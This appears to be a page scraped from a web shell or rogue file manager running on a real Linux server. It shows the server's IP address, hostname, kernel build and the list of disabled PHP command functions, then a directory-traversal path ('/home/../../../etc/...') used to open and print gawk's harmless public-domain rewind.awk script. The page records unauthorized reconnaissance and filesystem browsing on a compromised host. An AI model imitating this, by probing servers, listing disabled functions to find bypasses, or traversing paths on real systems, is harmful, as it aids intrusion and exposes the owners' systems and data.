uawdijnntqw1x1x1
IP : 216.73.216.170
Hostname : ps-hcp-gr-004.pouyasazan.org
Kernel : Linux ps-hcp-gr-004.pouyasazan.org 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
Disable Function : exec,system,passthru,shell_exec,proc_open,proc_close,popen,pcntl_exec,dl,show_source
OS : Linux
PATH:
/
home
/
..
/
..
/
..
/
etc
/
cl.python
/
..
/
cl.python
/
..
/
cl.python
/
..
/
..
/
git-core
/
..
/
git-core
/
..
/
awk
/
rewind.awk
/
/
# rewind.awk --- rewind the current file and start over # # Arnold Robbins, arnold@skeeve.com, Public Domain # September 2000 function rewind( i) { # shift remaining arguments up for (i = ARGC; i > ARGIND; i--) ARGV[i] = ARGV[i-1] # make sure gawk knows to keep going ARGC++ # make current file next to get done ARGV[ARGIND+1] = FILENAME # do it nextfile }
/home/../../../etc/cl.python/../cl.python/../cl.python/../../git-core/../git-core/../awk/rewind.awk